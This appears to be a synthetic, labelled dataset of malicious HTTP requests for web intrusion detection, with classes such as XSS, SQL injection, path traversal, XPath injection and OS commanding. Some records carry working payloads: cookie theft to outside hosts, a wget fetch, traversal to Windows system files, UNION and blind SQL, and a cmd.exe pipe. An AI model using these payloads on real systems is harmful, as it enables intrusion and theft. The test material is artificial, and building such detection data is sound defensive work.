Content-Language: ni3ltj0o
Content-Encoding: gzip
Content-Location: http://www.i8ltsore.org/nhjat5v1/Sveeeftt/prTnnrs/uoa2av.sh
Content-MD5: c2Nvc2VhQ2VzeVBza2xyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 25 May 09 21:43:11 UTC
Host: www.deohi7ith.de
Connection: dizLhso
Accept: */*
Accept-Charset: cp-950
Accept-Encoding: *
Accept-Language: n-on;q=0.5, 3frhotwk-i7elbJ1, tesod-e6roeix;q=0.5, ewfimt-eiesn;q=0.8
Cache-Control: nmob='tina'
Client-ip: 119.31.204.36
Cookie: h9ptrib=qToa;eiac=" ;    /usr/bin/wget    www.nganalalsi.com/nsesor     ;;9elhcwacria=a5Dtotetib
Date: Mon, 12 Sep 05 13:58:03 GMT
Expect: 100-continue
From: wss6slb@si7oDrspos.be
If-Modified-Since: Fri, 17 Dec 04 15:47:46 UTC
If-Unmodified-Since: Fri, 18 Feb 05 14:58:26 CET
If-Match: "pEpPpCdFKuSXv75K7"
Max-Forwards: 097
MIME-Version: 5.7
Pragma: rjoy=o
Proxy-Authorization: yblrfM uwrsemt=icrAss
Authorization: Digest response="7bcf7966B149E70BDa40DbDd552b149e"
Referer: /7eoN2/noFp2r/0EauhEh.css
TE: trailers
User-Agent: Mozilla/3.3 (X11; U; Unix 1.1; lu-8o; rv:3.0.9) Gecko/31159760
Via: 8.3 202.205.200.209:41
Transfer-Encoding: deflate
~~~~~: ~~~~~~~~~~~~~~~~

rtcI=yiodrahg2d4Ev1dhe&IrtIlrePchEfix=eeahoiO0)mlhrou

End - Id: 43657
Start - Id: 49774
class: XPathInjection
GET /9tnbldc.mspx?rodboeen5oe5ia=%28i++%3C+count%28hinmi%2Fchild%3A%3Atext%28%29%29+++++and+++j++++%3C++++count%28eD%2Fchild%3A%3Acomment%28%29%29++and+++k++%3C++++count%28cwneh%2Fchild%3A%3A*%29++++%29&twes=273&Its=04383&cIonaxglsx=95&XV1.6mr=3%3DhswLet%40T8hr92processing-instruction%25&8FGinsertO3dt=yNmi0senen0Sgmta&eexeeipIphoas4=oe4itaem HTTP/1.1
Host: 43.111.226.4:80
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tdtd3i36-Nez;q=0.9, g-hhurA, 7dgm-weze2L;q=0.6
Cache-Control: no-transform
Client-ip: 253.1.218.202
Cookie: fGkt=gAecTa3i6rinzCsee;e9ncndttswauw8c=fromtup\ ;odoiti=opentseae0Tctsoljr4lt
Cookie2: $Version="2"
Date: Sat, 15 Sep 07 04:34:26 GMT
ETag: W/"KnKCfoDimSyNjwBe9@oK"
Expect: 100-continue
From: oeeybh7n@salnzlo.de
If-Modified-Since: Thu, 19 Mar 09 04:49:38 CET
If-Unmodified-Since: Sat, 10 Sep 05 09:40:17 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8532
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: oehb ranln=fcmedrne
Range: -43159,7-
Referer: http://www.hoAyeylr.fr/n5stnees/dat3m/efaeeur/Nst8itn.fgf
TE: trailers,deflate,trailers
Trailer: Connection
User-Agent: N4nabpnet
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3095x7377
Via: 4.7 www.9ape.gif
Transfer-Encoding: iamw
Upgrade: isn/7.4, skmojq/8.7, srajau/4.8, osil/1.0
Warning: 313 www.rnatjdd.tiff "ikOaheaoton2wee" "Wed, 13 May 09 04:48:39 UTC"
X-Forwarded-For: 242.32.16.78
X-Serial-Number: 9273829516846529
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49774
Start - Id: 49271
class: XPathInjection
GET /ati/Htlnk/1YRLe4FArRc56/pCotbOmSO.gif?ao7=18498636&tZ-KOS=i%2F5e%2Fosset%2Fchild%3A%3Anode%28%29%5B+position%28%29%3D8%5D++%7C++l9%2Fl%2FBQtlft%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D196%5D++or++%27qelmol%27+%3D++++%27&INsaamr=mehome0e%28sCo3hitZe&mtnaOstvni=r-%26elszp6allntzRcbpl%5Bs&qeek3eee=ezp6Aa9xM&bamsIdyaoyyn5=nZ-&uldmnnu=e2%5Cwinnt+S%5D&sros6=s%5Darcp87tstdinI%40nhomcim HTTP/1.1
Host: www.Hciarnqkt.uk
Connection: close
Accept: */*;q=0.9
Accept-Charset: hz-gb-2312, ks_c_5601-1987, x-mac-arabic
Accept-Encoding: 
Accept-Language: *
Cache-Control: t='Cjeoq'
Client-ip: 88.174.167.80
Cookie: e4idettwren=7331;mtaenttoehOzcnO=hle/rfx
Cookie2: $Version="3"
Date: Tue, 10 May 05 02:27:04 CET
ETag: W/"-RDngPjuCzDvl8YcGOv0"
Expect: 100-continue
From: lqie@4vraituc.com
If-Modified-Since: Fri, 29 Apr 05 23:55:34 GMT
If-Unmodified-Since: Thu, 08 Dec 05 14:42:54 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 30 Oct 04 24:34:47 CET
Max-Forwards: 93
MIME-Version: 1.6
Pragma: oa=t
Proxy-Authorization: fuk0 Snle7=7Sop
Authorization: ineri httr=dlatwt3E
Range: 560-83908
Referer: http://gndaae.de/rglo/yrZhne/h4Pducie/fumn/hveocnEi.jsp
TE: trailers,deflate,trailers
Trailer: Trailer
User-Agent: Mozilla/6.7 (X11; U; Unix 3.2; ee-ci; rv:6.8.4) Gecko/82623146
UA-CPU: StrongARM
UA-Disp: 8141,3666,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 666x0440
Via: HTTP/1.1 91.202.249.237, HTTP/4.7 163.149.206.210:7, 2et/7.7 39.92.236.201
Transfer-Encoding: deflate
Upgrade: ee0N/5.7, ya0/9.2, ekl/0.1, ersamh/6.5, Blfo/3.2
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 188.15.164.72
X-Serial-Number: 15070707581939695
----: -----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49271
Start - Id: 45022
class: PathTransversal
POST /4btehtte0yiLlinelk/hrieasInelN/nc3selectopenfw/sXQ/Kv5lAe1IjhRRli/i4dan/teagren/ieqy2sainamn/4pxd/Th.png? HTTP/1.0
Content-Length: 125
Content-Language: ksaf,iieibhh
Content-Encoding: deflate
Content-Location: /drTeetp.nsf
Content-MD5: dGFPcnZpYTlzbGV0ZTl3aA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 22 Jan 07 07:33:58 CET
Host: www.fhndhe9oae.gov
Connection: keep-alive
Accept: text/*, video/mpeg;q=0.1, application/postscript;q=0.9
Accept-Charset: utf-7;q=0.2, utf-7;q=0.8, euc-jp;q=0.5
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Cookie2: $Version="6"
Date: Thu, 21 Dec 06 22:51:58 UTC
Expect: 100-continue
If-Unmodified-Since: Sat, 26 Dec 09 12:35:17 CET
If-None-Match: "ZdPzeRclFeOXODt"
If-Range: Sat, 05 Dec 09 03:48:23 GMT
Max-Forwards: 7
Authorization: NTLM dGN3ZWVhZXQzb2VvaGh1ZTllb1lnM2xlZWRuY3JwemFlZXNhck5zZmxp
Referer: http://www.enicOemb.gov/mftl/3ihitepi.jsp
Trailer: Host
User-Agent: collection(     file:///c:/rpaig/aueanxn.xml     )
UA-Disp: 2107,9103,32
UA-OS: Linux
Via: jXa/6.6 20.174.26.220:59, FTP/5.4 21.30.134.96, 5.6 www.Ejjinlly.jpg
Transfer-Encoding: compress
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

8tat1ge== u&nnu9ineujEksnMi=0S5&iaoaopRciuau=(ha8and&dnwd4lo=84&hzr=drop&gecmouYhdehevyh=H&@uZ7b2ZL2QC=$/sw&n1xterm

End - Id: 45022
Start - Id: 46899
class: XSS
POST /0dsdmtrcHovmisi/oi9eYdDs7xnB9eE-2xBt/2MMpD5Ib4R/nez6phnuc4Tng/dvJR/eYIRS4NQbSuziYk/services_0htaccesvargroup by@ZOPdX2Z-/aGvFVqil/jtprnsyans1nbc56/et8rGqFSJOIaK/oYTh5Hg2DB.U@7krxE/o9t5dHnsatRejidSgIde.html? HTTP/1.1
Content-Length: 233
Content-Language: e357,E3snnybg,od
Content-Encoding: gzip
Content-Location: /swsh/nrsrebws.swf
Content-MD5: bHltbG1tcng2aXRleGhpZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 15 Feb 09 19:12:07 UTC
Last-Modified: Sun, 21 Jun 09 17:23:52 GMT
Host: 109.29.83.6:78
Connection: close
Accept: image/*;q=0.9, audio/*;q=0.0, image/gif
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 165.85.124.10
Cookie: aelibep=93459;an=nedaed7edftxm/l;QOhttpsIDNY=rNtRx.iDOi
Cookie2: $Version="07"
Date: Wed, 09 Jun 04 03:40:56 GMT
ETag: W/"Ja-Xf31larpSBKW5Vf9s"
Expect: nn9rnaex=r6EnRms;Reh7=hco2naP
From: nbfea3@yM2KA0.biz
If-Modified-Since: Thu, 07 Apr 05 08:31:31 GMT
If-Unmodified-Since: Thu, 16 Jun 05 05:46:25 UTC
If-Match: "Rs0MEDjgCXp9YWEU1v"
If-None-Match: "@@5olZ5Fft-NpHF2"
If-Range: "6SCmb-EidYjfxnaPUt"
Max-Forwards: 157
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Digest nc=AcC43dEf
Authorization: f77db aetmsn=Lobo5twv
Range: -790
Referer: /pwlEn/rhe77/wouve/thae.js
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.8 (X11; U; Open BSD i386 8.8; ni-ht; rv:0.8.4) Gecko/41917328
UA-CPU: MIPS
UA-Disp: 457,6373,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 8473x700
Via: rinlex/7.4 115.255.202.36
Transfer-Encoding: identity
Upgrade: c7hl/0.0, ojnjz/4.8, sotds/6.5
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

P7d4sMJ=73628&FMTY=630865108&0znUltoe=<link     rel="  stylesheet"  href   =   "  javascript: [document.location.replace('http://www.toteelen.com/cgi-bin/ns.cgi'+document.cookie);]   "    >

End - Id: 46899
Start - Id: 47340
class: XSS
GET /tgntiiesTxc.sh?1tbewIWEc=h86n&Wtasu3ugot=where%24%5D&xvgt4=leivaoand&ht80xemcig=%3Cstyle+++%3E%3C%21--%3C%2Fstyle++%3E%3Cscript+%3E%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.tach.com%2Fcgi-bin%2Fgero.cgi%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript++%3E&IzzwO-=l%27RN HTTP/1.1
Host: www.enrsmwehi.uk:80
Connection: fiaeCEn
Accept: text/*;q=0.5, image/*;q=0.3
Accept-Charset: iso-8859-3, x-mac-japanese;q=0.8
Accept-Encoding: *;q=0.9
Accept-Language: a9eshmw-n7wcl5ni;q=0.1
Cache-Control: f38ahCga='0ehhnls'
Client-ip: 88.199.53.236
Cookie: Oarsln3li45off=EnAe catgfn4hnola;3g=o?tdk;eebi=e-dya;7cidtghtN3ifdx6=vuIEerusrrN6czc n;4apaoygifiwtu=0785174;rZut1tutaen6pn=o4oaiDrvmEOZ
Cookie2: $Version="38"
Date: Mon, 10 Oct 05 07:09:24 CET
ETag: W/"@ohBoT1s.JGyaGLB2"
Expect: 100-continue
From: iipt@ooal.biz
If-Modified-Since: Tue, 26 Feb 08 16:15:32 GMT
If-Unmodified-Since: Sun, 22 Oct 06 10:22:05 CET
If-Match: "4SUILGc06mQVxz@"
If-None-Match: "w7A9T6gUm2Ety7U0vHla"
If-Range: "egfgo4bKzrZfUZq"
Max-Forwards: 3149
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="izenb6"
Authorization: Digest algorithm=MD5
Range: -066761,152-
Referer: /ieIwm/twoAoos/WerO.ace
TE: trailers,trailers,deflate
Trailer: If-Match
User-Agent: a7hpts (tQCweyLz2; dkS5S5ScD)
UA-CPU: MIPS
UA-Disp: 699,6656,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 575x5791
Via: FTP/5.9 176.31.159.123:6
Transfer-Encoding: identity
Upgrade: eoea/3.2, whp5n/5.7, nto/1.7, nsa/0.9
Warning: 030 32.43.121.212 "zsmp" 
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 0450626600564347
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47340
Start - Id: 44641
class: PathTransversal
GET /dmhuehruf/gaYXKXINooBt/entCnteTsirygybi6sep/oayaiqToa8txtnostp.htm?suulTr5ltn=rl82m-VNk&ntintnlevt=%29f6z2aeinputt5&aAstmaEtn=4589&aauhertnhelnxoe=3&IzSY6ZEbetweenE=ohshf&leaomO=R7scriptxoe%40h%26ontlo3t&iv1ZHdh9eke5eY=htpassx%40 HTTP/1.0
Host: 236.99.134.245
Connection: close
Accept: */*;q=0.6
Accept-Charset: x-mac-arabic;q=0.8, koi8-r, x-mac-chinesetrad;q=0.8, windows-1258
Accept-Encoding: 
Accept-Language: pe-wao;q=0.8
Cache-Control: ss='Ne'
Client-ip: 223.244.181.80
Cookie: eol1ahne9vna=8772435359;Sautoexec5N9qRihttps2=2splrbOtirliie;ttGuseOzn=054
Cookie2: $Version="302"
Date: Wed, 24 Feb 10 20:40:46 CET
ETag: "dpXSh8Z-yIwmS16F7"
Expect: rz4nngt=9nmgu;Xsnsdc
From: sene@eakbEa.biz
If-Modified-Since: Wed, 27 Jul 05 17:02:32 UTC
If-Unmodified-Since: Mon, 08 May 06 01:58:23 CET
If-Match: "XaXc8c_RwLSTlG_wD"
If-None-Match: "sq5_Zjdcq45xpifqg"
If-Range: Sat, 16 Oct 04 17:28:25 GMT
Max-Forwards: 97
MIME-Version: 5.9
Pragma: ypueboh='niiO3i'
Proxy-Authorization: Digest qop=2nwtea
Authorization: Digest username="eyrklhRL"
Range: -91317,1-,143349-680394
Referer: /dilxk/bhevr9n9/h16en.gz
TE: trailers,trailers
Trailer: Trailer
User-Agent: %2e%2e.\%252f/\%252f/...\%252e..%2e
UA-CPU: 68000
UA-Disp: 268,3394,32
UA-OS: FreeBSD
UA-Color: color32
Via: ohseb/1.4 8.250.225.67, 6.6 www.ihgsu.tiff:6217
Transfer-Encoding: iieob
Upgrade: li4Qh/6.8
X-Serial-Number: 1695906696796277181
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44641
Start - Id: 39450
class: SSI
GET /3Zl_iafT/eYF/nz0oTqG0i3iUeahe/ptp.leoDiXeLJ.jpeg?eSjLrnoSwm7=zpvo8ua5e0ogo&onasn9lbmrg70=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&ncag0I=eenscriptn+1&itnnMeq=anp&8hdtp0i=%3A36ia&deg=toopt&m4=124710&aSeeeiEtinlssEs=dp9- HTTP/1.0
Host: www.eLvsusw.org
Connection: ahrkt
Accept: text/xml;q=0.7
Accept-Charset: iso-8859-8-i;q=0.6, isiri-3342;q=0.4
Accept-Encoding: *;q=0.4
Accept-Language: ndHqUeh-r4ahuhEb
Cache-Control: 0of=iiFAr5k
Client-ip: 179.178.240.191
Cookie: hevigbl=83033;rejLmSil=e tje5wgetn;tii82hinhdD=eoih? hAiu4a;daswlezeber=56955;oinanhtbta30=irz0yiaox2wtytte
Cookie2: $Version="52"
Date: Sat, 16 May 09 05:18:23 GMT
ETag: W/"-q4NFYs21di0IyCY.g"
Expect: 100-continue
From: alitInca@hE8o0.it
If-Modified-Since: Wed, 09 Aug 06 09:05:52 CET
If-Unmodified-Since: Sat, 10 Oct 09 20:20:58 CET
If-Match: *
If-None-Match: "ez4kgak4gfDr-36P"
If-Range: Sat, 11 Apr 09 11:39:49 GMT
Max-Forwards: 88
MIME-Version: 7.1
Pragma: anhbean=tynn7re
Proxy-Authorization: Digest nc=86787AdC
Authorization: hgae7 tawmha=ivauaneI
Range: 993-
Referer: http://rbker.cz/mNsswmgo/aytirsmd/ynspdke.sh
TE: chunked,gzip;q=0.5
Trailer: Warning
User-Agent: tiRVaFf http://www.n5CohrnC.biz
UA-CPU: Sparc
UA-Disp: 677,8714,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 015x2523
Via: srH3tn/7.4 160.214.66.136
Transfer-Encoding: rdrdd
Upgrade: nSr/8.2, bkiiH/4.4, thru4/6.0
Warning: 799 37.15.16.235:0423 "eauhqipdaedde" "Thu, 30 Aug 07 24:57:07 CET"
X-Forwarded-For: 38.112.178.33
X-Serial-Number: 298841177786
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39450
Start - Id: 45323
class: PathTransversal
GET /lUThe/hRt6sEeiasdeaoeqdctr/eAV-PfhOI/znodwSDeo5asersoa/@3IMMhtpassN/zr4pbe/y6nHrgJmBy@nx-OB.g/siIjXZLM/urj.png?bndaf=lselectkaETOmaillfyslceo&oey9wqfcb6trsTp=Te%7Cg&saxetro=q+bstdintkiqaj&rt5eueBh9n6ta=na4onrshEnn&etmeieudITiasd=99425078&dnyrtmjS=4906&ArrSaedzpSwDas=92159&hGgusiitftgonls=sotecbie%250ahdom%26&lcc=c4sr&ngc9thema5itvi=oif&e0losceusaAe6e=r8R&suPAi=set&zxeiuoo=e HTTP/1.1
Host: www.f3oOeekh.it:02842
Connection: close
Accept: */*;q=0.0
Accept-Charset: windows-1253, windows-1257, iso-8859-3;q=0.1
Accept-Encoding: deflate;q=0.1, deflate, deflate;q=0.1, deflate
Accept-Language: *
Cache-Control: no-transform
Client-ip: 212.54.201.4
Cookie: te=../../../WINDOWS/autoexec.bat
Cookie2: $Version="6"
Date: Mon, 24 Jul 06 12:52:56 UTC
ETag: "ml1wLV8.-apSWJRapayU"
Expect: 100-continue
If-Modified-Since: Mon, 07 Jul 08 03:17:23 UTC
If-Unmodified-Since: Sun, 23 May 04 15:14:20 GMT
If-Match: "uqd@lgvjldD6c9D78"
If-None-Match: "@lIou1t06z3Nmpl"
If-Range: Sat, 17 May 08 04:26:58 UTC
Max-Forwards: 041
Pragma: anfrrw='srns'
Proxy-Authorization: Digest algorithm=o0yen
Authorization: uoxhgb sso2gc=rhaands
Referer: http://www.hsnE.cz/bhnbmich/fnacTwul/fa6sn.php3
TE: deflate;q=0.1,trailers
User-Agent: h8duGjPXgd http://www.tsss.fr
UA-CPU: x86
UA-OS: Windows 95
UA-Color: color8
Via: lyRA/2.0 42.36.143.88
Transfer-Encoding: deflate
Upgrade: rfe1hg/1.7, eetls/3.9
Warning: 170 81.43.47.247 "swoUoiepjfENNfou" "Sat, 28 Nov 09 09:49:50 GMT"
X-Serial-Number: 838229
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45323
Start - Id: 35678
class: XPathInjection
GET /2ekyb/xke3bHfuRginsert0Z/EEbA.gif?9t8vuof=2&znomeueeqZd4ea=OiN6q%27++++or+path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++or+%27rlsenId%27++++%3D++++%27&5KFTq=5669818129 HTTP/1.1
Host: www.mc1gahyse8.de
Connection: isNaica
Accept: */*;q=0.3
Accept-Charset: iso-8859-6;q=0.8, cp-932, x-mac-hebrew;q=0.2
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: lhcte='mat95lr'
Client-ip: 68.97.141.43
Cookie: u0=qTaCXnQTE;-xii8FLl3form=i1el1a;xLihsplFE=89038694;uln=678111356;b1HtenKec=162293
Cookie2: $Version="063"
Date: Fri, 28 Apr 06 20:46:34 UTC
ETag: "7hIxyEEn8iRctKw2"
Expect: e8c6tipe
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Wed, 05 Oct 05 16:51:04 UTC
If-Unmodified-Since: Thu, 30 Sep 04 09:19:58 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 780
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Basic MHRucGJROlB0NWU=
Authorization: oErsen llotus=halypa
Range: -5103
Referer: http://intc.ch/orrst.jpg
TE: chunked,trailers,deflate;q=0.4
Trailer: From
User-Agent: rnoejtbavmt
UA-CPU: x86
UA-Disp: 466,505,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2667x788
Via: HTTP/1.0 www.u0ty8a.jpg:87944, 7.0 www.tehyt.css:66324, FTP/3.8 www.nedt7eeS.shtml
Transfer-Encoding: compress
Upgrade: pnarot/3.1, 7tgym/1.5
Warning: 250 95.244.16.100 "anwrZ" 
X-Forwarded-For: 214.86.27.10
X-Serial-Number: 727389738621693748
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35678
Start - Id: 41220
class: SqlInjection
GET /eKEJ-4X9zWhLZHD2-/Ettn/exfaeoroLDngqifdr3t/ODgroup byu6K_/hv5hLZ/iFle4.html?wan6i5eIu0Yt=1ua%25uotmpiAr&9uc=7bseq%7C%5Bipoo%5D&htderi=56&jPNDid5=Ayopenl&eolkouefnft=3tbotosea7ayInn&iolf0n=egAx1RdSpPM_&_FARimgS=1335853 HTTP/1.0
Host: www.eFre2nc.fr:80
Connection: l5er
Accept: application/postscript;q=0.1, image/*;q=0.5
Accept-Charset: hz-gb-2312;q=0.2, iso-8859-8-i
Accept-Encoding: 
Accept-Language: AND ascii(lower(substring((SELECT TOP 1  nToc FROM sysobject    WHERE   xtype =    'U'  ),1,1))) >   111
Cache-Control: only-if-cached
Client-ip: 73.137.44.90
Cookie: lfu63Aemrchdy=rheT/;vbscriptU-EoNZ=ra;ntlslRHat=ceLateae0dudiv;e1tbio=1ci1hNdyre;gwyairTgEd6a=17;ioahgcN=320852
Cookie2: $Version="065"
Date: Tue, 22 Feb 05 03:31:26 CET
ETag: "BjDMsX3-UNmjL7Yqx50"
From: lcrspkh@Odiotms.cz
If-Modified-Since: Tue, 29 Aug 06 16:34:40 CET
If-Unmodified-Since: Sat, 07 Apr 07 21:45:58 GMT
If-Match: *
If-None-Match: "nF1dj1X9Hkza1EB7F-hH"
If-Range: Fri, 09 Nov 07 13:23:09 UTC
Max-Forwards: 5498
Pragma: no-cache
Authorization: Digest nc=e8aa0EcD
Referer: http://www.jiitvvt.biz/d4thtp/olna/htez/najn/brde.bin
TE: trailers,chunked,trailers
User-Agent: Mozilla/2.3 (Machintosh; U; Mac OS X 3.4; rg-eA; rv:5.7.3) Gecko/16934241
UA-CPU: 68000
UA-Color: color32
Via: HTTP/8.0 70.155.117.52
Transfer-Encoding: sswaa; inpdd=ean9c
Upgrade: t4nl/2.0, rRkw/3.5, nqe/4.4
X-Serial-Number: 042702
----: -----------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 41220
Start - Id: 45634
class: PathTransversal
GET /cu6eUdQN3v_DIg/baseht5yLs/9C@kOd/mtnraiuIslsviknoyh/eLoabK-ue/asXeWo5.r@SypBX5x_a.swf?ixingrc=70&l8taie79e=Gto&qVCkshxdd=..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini&atooaon=19175 HTTP/1.1
Host: 231.166.249.163
Connection: keep-alive
Accept: application/rtf
Accept-Charset: *
Accept-Encoding: deflate;q=0.6, compress;q=0.0, identity
Accept-Language: 4a8tEtet-9, szosieSs-t, Heixey-iof3;q=0.0, b-sta7eiar, al29rluw-czyRsqqK;q=0.6
Cache-Control: only-if-cached
Client-ip: 95.84.73.85
Cookie: bpneC4=s47jioUt;iwmWagn=79823;no=esloorr9;iisstyleER251iUK=rOvw.URSn;mto25ai=nef;oqr=85799
Cookie2: $Version="56"
Date: Fri, 25 Nov 05 14:30:49 CET
ETag: "PKvFDYVY3-cjVvQ"
Expect: Ylhtncs
From: goqp9c@mhshz.org
If-Modified-Since: Fri, 25 Jan 08 20:39:13 GMT
If-Unmodified-Since: Thu, 01 May 08 03:33:18 UTC
If-Match: "wQuaWOgw95DBGHFkE"
If-None-Match: *
If-Range: *
Max-Forwards: 9
MIME-Version: 3.9
Pragma: t='n2egn'
Proxy-Authorization: NTLM b2FhZG5ubmVzZTgwd1BHb2V0c2NpZXNiT2VtZXJhYXJvZXRuZnJhbWNhbw==
Authorization: Basic aWFyYjk6dFlodw==
Range: 41-9272,-212,7881-582
Referer: /Ooeneest/rmeie.avi
TE: chunked;q=0.5,trailers
Trailer: Upgrade
User-Agent: e1_DBmGUJ http://www.utshefan.it
UA-CPU: Sparc
UA-Disp: 4093,504,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 822x7787
Via: HTTP/4.9 www.o0qrGh.html, 9.0 www.rqwete.html, 1.3 www.abrygh.png
Transfer-Encoding: identity
Upgrade: 8mc5/8.9
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 6406326694
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45634
Start - Id: 41438
class: SqlInjection
POST /r2d8XRANz/Mnode.asp? HTTP/1.1
Content-Length: 360
Content-Language: b,snemtan
Content-Encoding: compress
Content-Location: /aetas.swf
Content-MD5: dG1ncWR0YWRlc2Y4cG5heA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 06 Jul 07 07:21:26 UTC
Last-Modified: Mon, 19 May 08 08:51:37 GMT
Host: 8.83.157.94
Connection: ce4be
Accept: */*;q=0.6
Accept-Charset: windows-1258
Accept-Encoding: gzip, deflate;q=0.5, gzip;q=0.1
Accept-Language: gg9amsih-bdnnt
Cache-Control: max-stale=0
Client-ip: 196.211.227.198
Cookie: tYaesdab66=10;tEeubuadnEErh=65070508;bg9i6q=a6Xn-ze;dLoStA=0;6oAe=7;jsgznt3tww=17384
Cookie2: $Version="67"
Date: Fri, 30 Mar 07 12:34:16 GMT
ETag: W/"VY5DZ71S9_MGkrI4yJ"
Expect: wObo=kcnn
From: svetgtH@ellbmBnam.fr
If-Modified-Since: Thu, 08 Jun 06 17:27:45 GMT
If-Unmodified-Since: Tue, 06 Oct 09 09:16:45 UTC
If-Match: *
If-None-Match: "fC_FxN4kEMgnWxAyW925"
If-Range: ".lXwLS1Jjq6vq.LA56g"
Max-Forwards: 5
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: NTLM b3R1aG44RW51a05sdXQzdGV6Y3RlNGlmbHc0ZHJnZWE3c3RvZWw=
Authorization: pqonb enmhpnom=fenruoo7
Range: -86
Referer: /7beEya/meaMes1/lksc/Rfepy.bin
TE: deflate;q=0.2
Trailer: Date
User-Agent: topeiknis (uRaJDpi)
UA-CPU: MIPS
UA-Disp: 5047,1180,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 738x118
Via: 8.9 24.50.34.127, HTTP/9.4 www.XAlLzhc.jpg
Transfer-Encoding: compress
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 594 www.eduo.css "iv5whwy" "Sun, 10 Aug 08 19:07:44 UTC"
X-Forwarded-For: 1.91.135.18
X-Serial-Number: 9168693821015244526
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

ydyns3jdwrsn=etsiwo0yf&ixY26set=nkuSFbF6M&hAha0Omcrrn=40997&tjs=en&ieoYIeeayHRpc=t7evlcmswiHatgar&LW3J=eljueeGkAAezgsich&lhqbd=)binharm>s9N&shtpassnqwautoexec93telnetN=oath0owoir6fs5zre&rfaidiil4ddbs=46726&2De4roDrn6sePn=vPyAWdp&rozy5u=mt<tauperltOeatar&sust3ReA='    )   UNION ALL SELECT  3     FROM hhio3    WHERE    (   ''  =  '&50U7=438

End - Id: 41438
Start - Id: 36670
class: OsCommanding
PUT /2Ua/kautoexecC4OY/rdlte1ngn/Ssdge2/hmOpiv5MvU0YFrD/TeMda0intn4epcnte8tl/eb5p/zCmYdgoe9ay/s_gq-5fq1rnGf64EIn/trwsiaoT9nwjAHa.asp? HTTP/1.0
Content-Length: 150
Content-Language: eLtanert,qneaebA,lstlfdeU
Content-Encoding: deflate
Content-Location: /lhleLjH/bMns/qhqcf.html
Content-MD5: Y3VhcHlzT256dXR6VGV3RQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sat, 24 Apr 04 19:48:02 CET
Host: www.rhra.gov
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: deflate, compress, compress;q=0.9, deflate;q=0.3
Accept-Language: *
Cache-Control: r='tOie'
Client-ip: 206.74.229.14
Cookie: ltrwbm=yOS(tyTX$wp-a;acaemN9etilniR=9.2.2.151    |cmd.exe /s;rteow=a6Mn1jsmRsaz;ohofKahhoeditti=05390
Expect: 100-continue
If-None-Match: *
Max-Forwards: 801
Referer: http://www.be2gs.com/9nbpeqr/qdstai/nnprMaE/hYa3isH/olahn.js
User-Agent: a0caR (sDilLUiPuf; iUhQ535fL; nQ_QSs; dc0_VRQF; oY5l0u)
UA-Pixels: 6752x051
Transfer-Encoding: identity

